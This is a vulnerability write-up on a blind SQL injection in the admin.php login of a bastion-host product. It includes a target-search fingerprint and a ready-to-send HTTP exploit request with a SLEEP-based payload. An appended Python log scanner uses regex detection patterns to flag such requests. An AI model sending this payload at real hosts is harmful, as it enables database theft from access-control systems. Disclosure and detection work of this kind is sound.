SQL injection vulnerability in a certain bastion host

Statement:
This article is only for technical exchanges. Please do not use it for illegal purposes.
Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article are the responsibility of the user. The author of the article does not bear any responsibility for this.

1. Overview

COSCO Kirin Bastion Host provides fine-grained access control to maximize the security of user resources. Kirin Bastion Host has a SQL injection vulnerability.

Vulnerability level: High risk
Vulnerability impact: COSCO Kirin Bastion Host
FLY cert.subject="Baolei"

2. Vulnerability hazards

There is a SQL injection vulnerability in the admin.php interface of COSCO Kirin Bastion Host. An attacker can use this vulnerability to obtain sensitive database information and dump the database.

3. Vulnerability reproduction

login interface

POC:

https://ip:port/admin.php?controller=admin_commonuser 

If this response appears, it indicates that the vulnerability exists.

EXP:


POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))ptGN) AND '1'='1

Send the request with Burp.

Sleep 5 seconds

Sleep 10 seconds

4. Repair suggestions

    The official patch has been released, please upgrade.
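
To check proxy or WAF logs for requests like the one in section 3, before and after upgrading, the following added example (not part of the original article and not the vendor's code) flags time-delay payloads in the username field of admin.php?controller=admin_commonuser. The log record layout (url, body, elapsed_s) and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Time-delay primitives used by blind SQL injection (MySQL SLEEP/BENCHMARK).
DELAY_RE = re.compile(r"\b(sleep|benchmark)\s*\(\s*(\d+)", re.I)
# A quote followed by an operator or comment marker: breaks out of a string literal.
BREAKOUT_RE = re.compile(r"'\s*(and|or|union|;|--|#)", re.I)

def inspect(record):
    """Return a list of findings for one logged request (empty if clean)."""
    url = urlsplit(record["url"])
    query = parse_qs(url.query)
    if not url.path.endswith("/admin.php") or query.get("controller") != ["admin_commonuser"]:
        return []  # not the endpoint described in the article
    findings = []
    # parse_qs URL-decodes, so encoded payloads (%27, +) are normalised first.
    for value in parse_qs(record["body"], keep_blank_values=True).get("username", []):
        if BREAKOUT_RE.search(value):
            findings.append("quote breakout in username")
        delay = DELAY_RE.search(value)
        if delay:
            findings.append(f"delay function {delay.group(1).upper()}({delay.group(2)})")
            # A response at least as slow as the requested delay means the SQL ran.
            if record["elapsed_s"] >= int(delay.group(2)):
                findings.append("response delayed: injection likely executed")
    return findings

# Constructed sample records (hypothetical log layout, not real traffic).
SAMPLE_LOG = [
    {"url": "/admin.php?controller=admin_commonuser",
     "body": "username=alice", "elapsed_s": 0.08},
    {"url": "/admin.php?controller=admin_commonuser",
     "body": "username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))ptGN) AND '1'='1",
     "elapsed_s": 5.2},
    # URL-encoded variant that returned quickly, e.g. against a patched host.
    {"url": "/admin.php?controller=admin_commonuser",
     "body": "username=admin%27+AND+%28SELECT+*+FROM+%28SELECT%28SLEEP%2810%29%29%29x%29"
             "+AND+%271%27%3D%271", "elapsed_s": 0.1},
    {"url": "/admin.php?controller=admin_index",
     "body": "username=bob", "elapsed_s": 0.05},
]

if __name__ == "__main__":
    for rec in SAMPLE_LOG:
        print(rec["url"], rec["elapsed_s"], inspect(rec) or "clean")
```

A record that carries a delay payload but returns quickly is still worth reviewing as an attempt; the latency finding only separates attempts from requests where the injected SQL appears to have run.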

Origin blog.csdn.net/qq_56698744/article/details/132711548